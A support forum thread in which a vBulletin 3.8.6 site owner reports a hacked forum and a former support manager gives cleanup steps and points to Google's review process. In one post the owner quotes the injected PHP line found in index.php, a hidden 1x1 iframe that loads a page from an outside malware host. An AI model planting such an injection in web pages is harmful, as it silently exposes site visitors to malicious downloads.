Announcement

Collapse
No announcement yet.

Website hacked, need help!

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Website hacked, need help!

    My site wrestlingaddiction.com was hacked and it says


    Unable to add cookies, header already sent.
    File: /homepages/45/d248624452/htdocs/addiction/index.php
    Line: 2



    It's vBulletin v3.8.6 Patch Level 1. How do I fix this and why did it happen?

  • #2
    That type of error is usually from a bad file or modification. Why do you think this was hacked?

    To troubleshoot this, first reupload all the original vB non-image files (except install.php). Make sure you upload these in ASCII format and overwrite the ones on the server. Also be sure to upload the admincp files to whichever directory you have set in your config.php file. Then run 'Suspect File Versions' in Diagnostics to make sure you have all the original files for your version and that none show 'File does not contain expected contents':

    Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions

    [Note: In some cases you may also need to remove any of the listed .xml files in the includes/xml directory.]

    Next, disable all products (except vB Blog and vB CMS if you are running the Suite.)

    Admin CP -> Plugins & Products -> Manage Products -> Disable

    Then manually uncheck all plugins that are not for 'vBulletin Blog' and vBulletin CMS' here:

    Admin CP -> Plugins & Products -> Plugin Manager

    You must do BOTH of those steps in order to disable all non vBulletin Modifications.

    Then if you still have this problem, create a new style and choose no parent style. This will force it to use the default templates. Finally empty your browser cache, close all browser windows then try again. Make sure you change to the new style and view your forums with it.

    Do you have the same problem?
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

    Steve Machol Photography


    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


    Comment


    • #3
      I got it back on by replacing all files but my site has now been reported as an attack site and I have to click "Ignore this Warning" every time. How do I get it unreported?

      Comment


      • #4
        Reported by who or what? Whatever it is, you will need to contact them.
        Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
        Change CKEditor Colors to Match Style (for 4.1.4 and above)

        Steve Machol Photography


        Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


        Comment


        • #5
          I guess someone reported it while it was hacked and Google labeled it a "Malware site" or whatever. How do I contact them? Do you get the same warning when you go to the site? Freakin out here.

          Comment


          • #6
            My guess is the place to start would be to contact Google. You can also see if your host can help with this.

            I get the same thing. And when I click the link for more info it says this:

            If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
            Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
            Change CKEditor Colors to Match Style (for 4.1.4 and above)

            Steve Machol Photography


            Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


            Comment


            • #7
              Ok I've sent my site under review. I found the malicious code. It was in index.php and was this:

              echo "<iframe width=\"1\" height=\"1\" src=\"http://fenkaololo.com/mmmsss/xpxlkzbuaodwitdwy.php\"></iframe>";

              The question is how did he access it? Are you sure he got in through my Mods?

              Comment


              • #8
                Unfortunately there is no way for us to know how that was put there. Please see this thread on how to make your vBulletin more secure:

                http://www.vbulletin.com/go/secure

                If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
                Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                Change CKEditor Colors to Match Style (for 4.1.4 and above)

                Steve Machol Photography


                Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                Comment

                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                Working...
                X